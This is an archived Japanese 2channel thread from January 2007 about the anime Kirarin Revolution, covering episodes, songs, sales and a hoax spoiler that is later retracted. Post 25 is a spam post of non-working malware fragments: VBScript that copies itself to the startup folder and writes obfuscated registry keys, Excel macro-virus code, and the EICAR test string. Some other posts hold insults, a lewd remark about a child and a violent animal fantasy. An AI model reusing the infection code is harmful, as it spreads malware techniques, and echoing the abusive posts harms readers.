2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

きらりん☆レボリューション お笑い8リナに喝采

1 :風の谷の名無しさん@実況は実況板で:2007/01/05(金) 19:07:23 ID:JlsUW0eS
★【※実況厳禁】スレあぼーん+懲罰サーバ(スレ運営が困難)送りだバーロー。
★基本的にsage進行(メール欄に半角でsage)でなー。2chブラウザ推奨なー。
★荒し、煽りは徹底的に放置なー。
★次スレは>970が立てることなー。立てられない時は代わりを指名なー。
==================================================
@実況(放送時間中の書き込み)は実況板でバーロー
 番組ch(TV東京)板
  http://live22x.2ch.net/livetx/
 BS実況ch(民放) 【※BSジャパン】
  http://live22x.2ch.net/livewowow/
 スカパー実況板 【※AT-X】
  http://live22x.2ch.net/liveskyp/
 アニメ特撮実況掲示板(read.cgi終日停止中/2chブラウザ以外では閲覧不能)
  ttp://cha2.sakura.ne.jp/cgi-bin/anitoku/
 2chブラウザ
  ttp://ringonoki.net/tool/2ch/janeview.html

☆前スレ
きらりん☆レボリューション 7ーさんといっしょ
http://anime.2ch.net/test/read.cgi/anime/1164489012/l50

関連スレ
きらりん☆レボリューションの月島きらり4
http://anime.2ch.net/test/read.cgi/anichara2/1162543914/
きらりん☆レボリューションの藤堂ふぶき
http://anime.2ch.net/test/read.cgi/anichara2/1159670874/

2 :風の谷の名無しさん@実況は実況板で:2007/01/05(金) 19:08:43 ID:JlsUW0eS
☆放映スケジュール
 テレビ東京系 毎週金曜日 18:00〜
 BSジャパン  毎週日曜日 18:00〜
 AT-X      毎週土曜日 9:30〜/20:30〜
          毎週水曜日 13:30〜/23:30〜
その他のネット局 http://www.medianet.co.jp/kokunai/program/fri.html

☆公式サイト
 ttp://www.tv-tokyo.co.jp/anime/kirarin/
☆まとめサイト
 ttp://kirarin.cowboy7.com/

☆原作スレ
[少女漫画板] *+・中原杏・+*
http://comic6.2ch.net/test/read.cgi/gcomic/1117953402/

☆過去スレ
0 http://anime.2ch.net/test/read.cgi/anime3/1135506883/
1 http://anime.2ch.net/test/read.cgi/anime/1144157967/
2 http://anime.2ch.net/test/read.cgi/anime/1144418344/
3 http://anime.2ch.net/test/read.cgi/anime/1145644798/
4 http://anime.2ch.net/test/read.cgi/anime/1148827408/
5 http://anime.2ch.net/test/read.cgi/anime/1152661876/
6 http://anime.2ch.net/test/read.cgi/anime/1158847627/

3 :風の谷の名無しさん@実況は実況板で:2007/01/05(金) 19:09:59 ID:CcM6OzdH
テンプレながっw
1乙

4 :風の谷の名無しさん@実況は実況板で:2007/01/05(金) 19:17:31 ID:c2s+aSlc
>>1
乙のスリランカ

5 :風の谷の名無しさん@実況は実況板で:2007/01/05(金) 21:01:50 ID:gsa2e44c
>>1乙バラライカ

6 :風の谷の名無しさん@実況は実況板で:2007/01/05(金) 23:02:48 ID:Txz5hqX5
>>1乙やらないか

7 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 00:30:42 ID:OU41FqKd
ttp://blog.upf-web.com/kanon/
これバラライカ?

8 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 01:16:51 ID:wX2aoU9e
大きな愛での時も思ったけどころころED変える必要あるのか?
バラライカは3月まで使うんだし水色メロも3月までやれば良かったのに
EDは今までみっつとも神作画だったのに今度のはデフォルメキャラで手抜きっぽくて嫌

9 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 01:21:32 ID:wX2aoU9e
今気づいたけど新EDってCDで既出の曲じゃん
ますます変えた意味がわからん

10 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 01:35:50 ID:PDfU0HC8
今回は神回だったな
できれば南あおいと千和の曲も歌ってほしかったけど

夏のスリランカのサビ展開は実によい

11 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 01:48:39 ID:V9i0Tltc
放映タイミングの妙だな。
年末年始にさんざん歌番組を観ているから架空の歌番組として自然に観れる感じ。

12 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 02:28:32 ID:CVX39J7D
夏のスリランカ
ttp://puka-world.com/php/upload/large/img-box/1168018088873.mp3

13 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 04:10:52 ID:RGJHQjkP
ふぶきの衣装が予告と違っていたような気がしたけど気のせいかな?
エリナの下半身象は一応下ネタそしてマジンガーZのゴーゴン大公リスペクトですか?w
そして新キャラの中の人はプリーティアやってた人ですか
(他にもう一つ小学館アニメ繋がりで有名な役があるけど挙げたらあの人来そうだから止めておきますw)

きらレボは2年目あるとの事ですがやっぱ2年目はタイトル変わるのかな?
(例えばミルモでポン〜ごおるでん〜 みたいな)

14 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 05:14:10 ID:29tY0CPv
エリナの歌声が微妙ジュディマリみたいだった

15 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 07:00:18 ID:1WwhogvU
小学館厨氏ね

16 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 07:02:50 ID:D9SbEYeS
>>12
パオ〜ンwwwwwwwww

17 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 07:39:10 ID:FQFs8UTT
新EDかぁいい〜
はう〜〜〜お持ち帰りぃ〜〜〜〜〜〜〜〜!

特になーやんの頭にカメさんがとてもかわいい〜!

18 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 10:28:07 ID:GSF5yCph
   うっほ   うっほ      うっほ   うっほ  うっほ  うっほ  やらないか?
 うっほ   うっほ   うっほ   うっほ    うっほ    うっほ   やらないか

  | │                   〈   !   ゆらり ゆらり ゆれている 男心 ピンチ
  | |/ノ二__‐──ァ   ヽニニ二二二ヾ } ,'⌒ヽ かなり かなり やばいのよ
/⌒!|  =彳o。ト ̄ヽ     '´ !o_シ`ヾ | i/ ヽ ! 助けてダーリンクラクラリン
! ハ!|  ー─ '  i  !    `'   '' "   ||ヽ l | 何もかもが 新しい世界にきちゃったわ
| | /ヽ!        |            |ヽ i ! たくさんの ドキドキ 体験 挑戦 イクぞ!
ヽ {  |           !           |ノ  /  やらないか やらないか やら ないか かいかい
 ヽ  |        _   ,、            ! , ′  この想いは止められない
  \ !         '-゙ ‐ ゙        レ'    もっとオトコ・チック パワー ビーンビキンキン
   `!                    /       ちょっと キケンな カ・ン・ジ
    ヽ     ゙  ̄   ̄ `     / |     やらないか やらないか やら ないか かいかい
     |\      ー ─‐       , ′ !      もう ビクビクとめられない
     |  \             /   |     もっとドラマチック ゲイ☆バレルヤ
                             ふたりだけで やらないか

   うっほ   うっほ      うっほ   うっほ  うっほ  うっほ  やらないか?
 うっほ   うっほ   うっほ   うっほ    うっほ    うっほ   やらないか
          や     ら      な      い      か

19 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 11:13:19 ID:X9GN0Pd6
「あ、もしもし?〇〇〇・〇〇〇〇ですか?ああ、依頼があるんです。>>18を叩きのめしてください」

20 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 13:58:01 ID:Fm7He7Iw
すげえ曲だな夏のスリランカ…

21 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 14:36:25 ID:M02/jh4f
>>17
レナ乙

千和の歌はないのかな
あとミステリアスな子

22 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 17:53:10 ID:1dJDPk0A
今までエリナの魅力に気付かなかった自分が恥ずかしい

23 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 19:59:08 ID:fOMEQpkN
きらりさんは最高だけどエリナさんは最強だ

24 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 22:37:15 ID:7G6WoRLC
河童のお皿が乾いたら 愛情拳固でごっつんこ
その○○○○いて
出かけましょう おやつをいっぱいほっぺに入れて “アミ〜ゴ〜ゥ”
きりんのマツゲ↓ イワシのせびれ↑
まったり気分の糞転がし “ナマステ”

群青色の蜘蛛に乗り あなたとイキたい夏のスリランカ
ah〜思っただけでヨダレがナイアガラ
何か起きそうな夏のスリランカ


○の部分がなんていってるのかわからない・・・

25 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 22:56:52 ID:XVrglFwB
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

26 :風の谷の名無しさん@実況は実況板で:2007/01/06(土) 23:22:18 ID:wX2aoU9e
http://rinrin.saiin.net/~mameimo/kark/
ここの管理人女かな?
腐女子できらレボ好きな奴はじめて見た

27 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 00:12:02 ID:mjaOsE6q
そういえば801同人はありましたかキャラは結構そろってると思うんだ
イケメンアイドル二人組みとか、なーさんとかなーさんとかなーさんとか

28 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 00:15:47 ID:JWljW5o5
>>24
2行目は「そぅ涙を拭いて」かなぁ
それから前スレで誰かが言ってたけど「糞転がし」と「ナマステ」
の間に「クッキー」みたいな言葉が入ってる?
あと、「蜘蛛」なのか??普通に考えたら雲だけど確かに普通
の歌じゃないからな…

29 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 00:16:51 ID:mjaOsE6q
そういえば801同人はありましたかキャラは結構そろってると思うんだ
イケメンアイドル二人組みとか、なーさんとかなーさんとかなーさんとか

30 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 00:28:44 ID:0Lu+q28v
そういえば801同人はありましたかキャラは結構そろってると思うんだ
イケメンアイドル二人組みとか、なーさんとかなーさんとかなーさんとか

31 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 01:00:38 ID:xp1G9UQD
>>10
×南あおい
○南あかね
千和が演じてるのが霧沢あおい

32 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 01:13:51 ID:h9I7POP0
やっぱりラスボスは霧沢あおいなのかな
打倒あおいと恋の三角関係が来年の軸になっていきそう

33 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 09:00:11 ID:gGc4vB+0
OPにネーちゃんが出てきた。
すごい格好だ。

34 :30:2007/01/07(日) 09:48:01 ID:mjaOsE6q
なぜかレスが重複してるスマソ

35 :風の谷の名無しさん@実況は実況板で:2007/01/08(月) 03:18:01 ID:n7V2oMCU
昨日地下鉄有楽町線に乗ってたら月島駅のところで親子連れが、
親「月島といえば?」
子「きらり」
と言っていて、思わず吹いた。

見たところ姉弟みたいだったけど、男の子も見てるのな

36 :風の谷の名無しさん@実況は実況板で:2007/01/08(月) 08:46:32 ID:f+JkkZtl
そのあとトイレにかけ込んで
女の子にきらりさんカードをあげるから・・・
ってのを想像してしごいたんだろ?
あるある

新EDの最後がどうしても煩悩って聞こえる
きらりさんの曲って暗喩だらけだし、これも狙ってるのかもしれない

37 :風の谷の名無しさん@実況は実況板で:2007/01/08(月) 17:11:34 ID:OtCEXeHc
おかしいな、陶山と保志がまるで歌が上手い風に聴こえてしまった。
下屋はブラックビューティーシスターズの時の方が好き

38 :風の谷の名無しさん@実況は実況板で:2007/01/08(月) 18:12:09 ID:VGv+k2iT
バラライカ唄うなら
デザインパクられたあの服よりか
もう1つの普段着っぽい方が良いと思うのだが。

39 :葉猫 ◆Jz.SaKuRaM :2007/01/08(月) 19:34:28 ID:Ki0Rwi1u
普段着の方が絶対可愛いよな(`・ω・´) シャキーン

40 :風の谷の名無しさん@実況は実況板で:2007/01/08(月) 19:48:42 ID:VGv+k2iT
>>37
会場を表現している為か音にエコーが掛かっていて
それがうまく聴こえる理由かもしれん。

41 :風の谷の名無しさん@実況は実況板で:2007/01/09(火) 04:10:37 ID:cUaF2s3x
それってつまり風呂で歌うと上手く聞こえるってやつか

42 :風の谷の名無しさん@実況は実況板で:2007/01/09(火) 12:05:05 ID:E3INW6Aa
CD聞いてもゲームやっても宙人より星司の方が歌がうまく聞こえる(´・ω・`)

43 :風の谷の名無しさん@実況は実況板で:2007/01/09(火) 12:59:06 ID:1DFRjAzn
きらりがうんこするシーンがあるエロ同人ってないの?

44 :風の谷の名無しさん@実況は実況板で:2007/01/09(火) 14:22:31 ID:W8Ch3maS
またお前かw

45 :風の谷の名無しさん@実況は実況板で:2007/01/09(火) 16:25:00 ID:0rroRI8V
すっかりきらりの声に違和感を感じなくなった
もう今後は声優でやっていけば良いよ

46 :風の谷の名無しさん@実況は実況板で:2007/01/09(火) 22:15:26 ID:5806dFNo
225 :メロン名無しさん :2007/01/09(火) 20:21:50 ID:???0
320 (´ー`) ◆zMjDXxy76Q sage New! 2007/01/09(火) 20:21:11 ID:oXt2+8MQ0
>>319
01/05(金)
*3.5 18:00〜18:30 テレビ東京「きらりん☆レボリューション」

47 :クイックブーメラン ◆jhHrKnul9A :2007/01/10(水) 00:11:21 ID:vvMD8kvh
久しぶりだなきらレボに萌えているヲタク共!
オレは冬休みの間旅行に行ってて今日帰ってきたばかりだぜ!
さっそくきらレボ叩きを開始したいがポケモンスレで桜井の話題が出ているので突撃してくるぜ!

48 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 05:15:09 ID:qIwlz4kS
さすが、律儀だな

49 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 18:01:46 ID:x+L8ZNrs
きらりのバラライカがまだオリコン50位以内で粘ってるよ。まじすげー

50 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 18:20:13 ID:kk3JVCNd
>>49
さて、昨日分のデイリーはどうでしょうかね
正月モード抜けたからな

51 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 18:31:56 ID:x+L8ZNrs
ていうか新OPの放送開始が全国でちょっとづつ遅れてるのもあるらしいよ。

52 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 18:45:22 ID:IbY6MfFn
なるほど

来月出るアルバムも売れるかな

53 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 18:51:34 ID:mRmPiaTr
バラライカ6万枚超えオメ〜☆

54 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 19:41:55 ID:MUtFgadX
いつもならキャラソン出すために歌で時間つぶしかよ
って思うんだけど、きらりだと「ようやく歌ってくれた」って感じだなw
あと、夏のスリランカの歌詞のスリランカ率が低い気がするwww

55 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 20:14:48 ID:XvjsfCsj
エリナさんはエリナさんだけでCD出して欲しいなー
アルバムとは言わないから。マキシでいいから。

56 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 20:38:15 ID:hoE5lSsA
>>55
ふぶきやSHIPSもシングル出して欲しい

出来ることならなーさんレボリューションもw

57 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 22:06:33 ID:rS/GN1Yt
>>56
SHIPSについてはCDがすでにリリースされてると聞いたが

58 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 22:34:02 ID:JD8RD1yC
>>57
きらりん☆レボリューション ソング・セレクションに入っていると見たが

59 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:01:18 ID:uxMT+SYO
日渡カメさんのCDも出してくれ

60 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:11:22 ID:zgrYaRSM
カメさんの切ない声は萌えるな。

61 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 06:25:39 ID:2d5UOUjB
カメさんレボリューション

なーやんレボリューション

62 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 12:05:21 ID:jL208G0H
飼ってたのがさめじゃなくてわにだったら、食べさせて証拠隠滅で完全犯罪だったんじゃね?

63 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 12:51:55 ID:Dz1GhT8X
俺はこの番組の一番の萌えキャラは会長だと思うんだが

64 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 15:12:17 ID:2CHuxtRV
会長レボリューションにも期待

65 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 23:10:20 ID:Zgyn2xx/
なーさんと会長の学園ラブコメは萌えたw

66 :DJ OZMA:2007/01/12(金) 00:30:13 ID:RIIRo5QD
なーなーななな ななな ななな
 なーなーななな ななな ななな

きらレボの影響受けすぎwww

67 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 00:39:02 ID:95dwy1Ss
ところで、
なーさんが出るのは、明日で最後なんだね。


68 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 01:05:45 ID:0esxxHX+
kwsk!!!!!

69 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 01:40:26 ID:Z8jaDpgU
月島きらりの大躍進は、なーさんの活躍にあると知ったオフィス東山は
なーさんを亡きものとするべく刺客を送り込む。
宙人のハワイロケをきらり達が見送りに行った空港で
なーさんは刺客に大型動物用強力麻酔銃で狙撃されてしまう。

一命はとりとめたものの昏睡状態に陥ったなーさんは
きらりの必死の介護もあって再び目覚めるが、
以前のようなスーパーキャットではなく、意思疎通すらできない、ただのネコとなっていた。
それでもきらりは「なーちゃん」と呼び、変わらぬ愛情を注ぐのであった。

原作ではあまりの唐突さに「なーさんが万能すぎるので読者から苦情が来たのではないか」
などとの憶測も出ていた。この事件以降、原作では増刊号でのサイドストーリーを除いて
なーちゃんは登場していないから、実質なーさんが出るのは、明日で最後という事になる。

70 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 03:14:22 ID:SwjzTXb3
>>69

71 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 12:34:16 ID:0esxxHX+
マジでか
今日は高画質で録画せねば

72 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:28:14 ID:0sZcBLWo
>>71は勝ち組だなw
同じ少女アニメでも、ふたご姫の入浴シーンは首から上しか出てなかったのに、
きらりは鎖骨どころか胸元までOKかよ

73 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:29:31 ID:LGMLomWc
時々テレビ画面を見るって感じだけなんだけど、今日の作画いつもよりよかった気がした

74 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:31:08 ID:Ld/Y+FlN
新ED 歌は微妙だが絵は良かったが、

75 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:31:42 ID:NK5z2gkw
書き込みがほとんどねえ・・・
本当にここは本スレなのか?

76 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:33:07 ID:Ty4uiuhz
なーさん俺にもくれよ

77 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:35:00 ID:EPOPXjQB
原作話つまんねえ・・

78 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:35:08 ID:KlB47yZ3
対象年齢の子たちには結構人気らしいなコレ
最初見たときは半年打ち切り決定と思ってたのに、わからんもんだ

79 :◆Lu6.KIRARI :2007/01/12(金) 18:36:11 ID:NJoX40ds
流石になーさんにマカダミアチョコやらなかったな。
やったら死んじゃうしw
つうかきらりも独り立ちしろや少しはw

80 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 18:40:27 ID:XIZPm9F2
なーさんがいれば家事やらなくていいなw
きらりはいらんがなーさんは欲しいぞ

81 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 19:00:26 ID:X3Kb5Emd
ttp://sakuratan.ddo.jp/uploader/source/date30749.jpg

82 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 19:05:12 ID:7gDmncnj
なーさんがいなくなってからきらりの部屋が荒れ果ててしまう所は
ミルモでポンで妖精(ヤシチ)がいなくなった時の日高さんを思い出したり
どっちもパートナーが便利過ぎる為に依存しすぎなのは同じかw
(そういや気が強いところも似てるような、、少なくともきらりは
ミルモの主役の楓と同じタイプじゃないのは確か)

後今回は妙に気合入った風呂シーンやシャワーシーンあったけど
これも2年目決まった余裕なのかな?w

83 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 19:28:58 ID:odvdviY0
宙人の弟がわざとソースかなんかこぼすシーンがあったが、なーさんかきらりを嫌ってのことなの?

84 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 19:40:19 ID:L02jph7k
>>83
あれはなーさんに構ってもらいたいように見えた

85 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 20:06:15 ID:GuyCViHf
なーさん・・あなたがいないと部屋の中がガランとしちゃったよ・・

86 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 20:16:37 ID:F+HbiDSQ
なーさん過労死しそう…

何処に行っても便利な小間使い扱いって
優秀なのも考え物だな

87 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 20:19:18 ID:5Gotn4RC
2話構成にしてきらりが独り立ちできるようになってから帰ってきてほしかったな
依存しっぱなしなのが気になる
最終回になっちゃうけど

88 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 20:24:16 ID:5wCPhaxw
ドラえもんがいなくなったのび太や
ピカチュウを置いていこうとしたサトシですら
もう少ししっかりしていたというのにきらりときたら。
にしてもなーさんすげえ。
かくし芸でなーさんしかがんばってない事にツッコミが入ってワロタ

89 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 20:36:14 ID:dpOoNFDb
俺もなーさん欲しいよ・・・。

90 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 20:43:20 ID:39ea5kA1
>>75
アニヲタに愛されなくても本来の視聴者である子供達に愛されていればそれで良い


っていうか、実際幼女人気半端ねーぜ!

91 :葉猫 ◆Jz.SaKuRaM :2007/01/12(金) 22:02:35 ID:EtOYrec+
お風呂シーンもうちょっとエロくちて欲ちかったぜ (´・ω・`)ショボーン

92 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 22:13:01 ID:0esxxHX+
>>69
内容全然違うじゃねーか!!!!

でも今日はいい話だったから許す

93 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 23:29:08 ID:LGMLomWc
今日アニメディア買ったら、きらレボのあらすじはサブタイ以外すべて未定だった・・・

94 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 23:39:42 ID:i9FLJcoa
宙人の母親、赤ん坊までいるのに海外で仕事って育児放棄か?

95 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 23:44:31 ID:adcEmzCo
来週はあおいが出るので絶対見るわ
金曜夕方は何気に斎藤千和アワーになってるなぁ

96 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 00:03:32 ID:9f1REwsF
>>69 って何だったの?
釣り?
原作はそうだったのかな?
なーさんの出てこないきらりなんて考えられないんですけど!

97 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 00:26:29 ID:nsxXesuA
ごめんなさい>>69は嘘です。
原作では虹太くんの誕生日プレゼントとしてなーさんがヘルパーをするという以外は
アニメと同様(入浴シーンも)です。
本気にしてしまった方には、いらない心配をかけてしまい本当に申し訳ありません。

98 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 00:31:41 ID:pilcdEOZ
ていうか信じるなwww

99 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 00:36:11 ID:su5VJPvo
どこまでがボケかわからんw

100 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 00:39:21 ID:0GpzFZ7n
うそだろうとは思っていたがちょっとびくびくしながら見たぞ

101 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 01:12:42 ID:yOoAAmkF
>>94
乳児・幼児がいるのに平気で夫婦して出張って、犯罪だよコレ。
マジな話、ベビーシッターに家政婦と二人は常駐させていなけりゃ、
いくら年長の子がいても、怖くてこんなこと出来ない。
しかも長男は芸能人だから普通の学生より家にいない訳だし。
きらりとなーさんの絆のいい話にしたかったんだろうけど、
その為の状況設定が、今回は不快すら覚えた。ちとオーバーかもしれんが。

102 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 01:36:46 ID:ccpOI2CZ
>>101
俺は幼い頃から両親仕事でほとんど家にいなかったが
お前はそういう家庭を否定するのかよ、死ね。

103 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 03:20:05 ID:yOoAAmkF
>>102
お前バカ?オレも長いこと共稼ぎ家庭に育ったよ。
だが、幼児だけでなく乳児までいる状態で、
何日も家を空けるようなまねはしなかった。
人や託児所には預けても毎日帰宅していた。
おまえはミルクしか飲めない頃から、他人の大人の手助けなしに
両親が何日もおまえを放置しておいたというのか?すげえなおい。


104 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 06:30:54 ID:1tQO19zi
お前らそんな事より




星司が空気過ぎる件について

きらり、星司目当てで芸能界入りしたって設定はどうしたんだよ……

105 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 07:34:57 ID:LdIB9GNB
セージくんは、説明役つなぎ役みたいになってるね

106 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 09:27:01 ID:LecyOc4O
最近はシップス出しすぎだな
ヒマ人にしか見えん

107 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 09:41:45 ID:IQbPeKG8
久しぶりに見たら、きらりの声優が割と上手くなってた

108 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 11:52:23 ID:degO20cL
きらりって本当にセイシのことが好きなの?

109 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 12:49:43 ID:BjEjmpK5
アニメ冒頭で宙人の弟のコウタが事故にあったわけだが
リアルで過去出演した吉澤の弟の弘太が事故死だそうな

((( ;゚Д゚)))ガクガクブルブル

110 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 13:00:08 ID:OBAGI2fn
俺もその記事見て同じ事思った

111 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 13:23:14 ID:LGX3u7nC
「大変だ!!!こうたが事故で!事故で!!」
宙人「こうたがどうしたって!?車か!バイクにはねられたか!!!」って
 ↓
吉澤弘太(16)車にはねられ死亡

112 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 13:55:57 ID:15mA/s/p
故意かな? ひょっとしたら

113 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 14:09:36 ID:+AJ0PBa4
宙人の方は、ツッコミ役、世話好き、家族描写有りと単独キャラとしての扱い良いけど
星司の方は大概は宙人とセット、何か喋っても「わー、すごいねー」「カメさん、カメさん」と掘り下げが足りない

いや、これから星司話増えるかもしれないけど

114 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 17:39:25 ID:LNR4dSMV
きらりが最初に星司に惚れたのだって顔以外に理由なさそうだしな。
星司の方も特にきらりに恋って感じでもないし、三角関係としては盛り上がらん。

115 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 18:09:38 ID:HRhXhF/r
星司はきらりから好かれてることを知ってるんだろうか

116 :風の谷の名無しさん@実況は実況板で:2007/01/13(土) 20:16:22 ID:7s9FaR3c
今回の話でますますなーさんをぐちゃぐちゃにしたくなった
きらりの目の前でなーさんを踏み潰してぐちゃぐちゃにして
「なーさんを返して!」って泣き叫ぶきらりが見たいなー

117 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 03:30:35 ID:WlwewJkW
二期決定しているらしいな
あと1年くらいやるのか

118 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 06:06:26 ID:Zu+FJjvJ
デビューネタも、アイドル対決ネタも、ドラマネタも、なーさんネタも
大食いネタも、海外ネタも、すでに出ているのに、
2期目何のネタでやっていくんだろう?

119 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 06:24:48 ID:riTcSSn7
きらりのしゃべり方ってかわいいですよね!

120 :名無し募集中。。。:2007/01/14(日) 06:58:49 ID:419aJCeI
異世界にワープしてカードバトル

121 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 08:44:29 ID:6G/p6RwB
>>118
なーさんメインになって毎週ネコ友達が増えていくとか

つかまだ出てないキャラとかネタなら沢山ある

122 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 08:53:22 ID:1+0ugx9O
来週は水着見れる。(;´Д`)ハァハァ。

>>118
宇宙へ行くってのもありかと。
それかきらりが作者の所へ行くとか。

123 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 10:08:57 ID:kpER2vCM
アニメでよかっさんシリーズは勘弁してほしいなあ

124 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 16:21:16 ID:Whhbrxwq
>>118
エリナ芸人転向

125 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 19:12:34 ID:11yntRur
読んでないからなんともいえないけど原作にはまだ大量にアニメに出てないキャラいるっぽいね



オフィス東山からSHIPSのライバルになる男子2人ユニットとか出てくる?らしいし

126 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 19:27:59 ID:Q5YLIfeZ
それって前にふぶきの後ろで踊ってたライノセラスってヤツらじゃないの?

宙人「これぞ模倣美!」


127 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 19:44:02 ID:sqQrL1xU
2年目以降の予想

目的
・恋のほうは(アニメ全体においての終盤まで)持ち越し。一方で、芸能活動しながら母探しするかもナ

128 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 19:59:59 ID:ATHdq7Vz
あおいやエリナやふぶきのキャラソンCD化はしばらく無いよね?
二月はきらりのアルバムだしこの前のアルバムにSHIPSの曲入ってるし。
嵐やみゃーさんももっと活躍して欲しいところだ

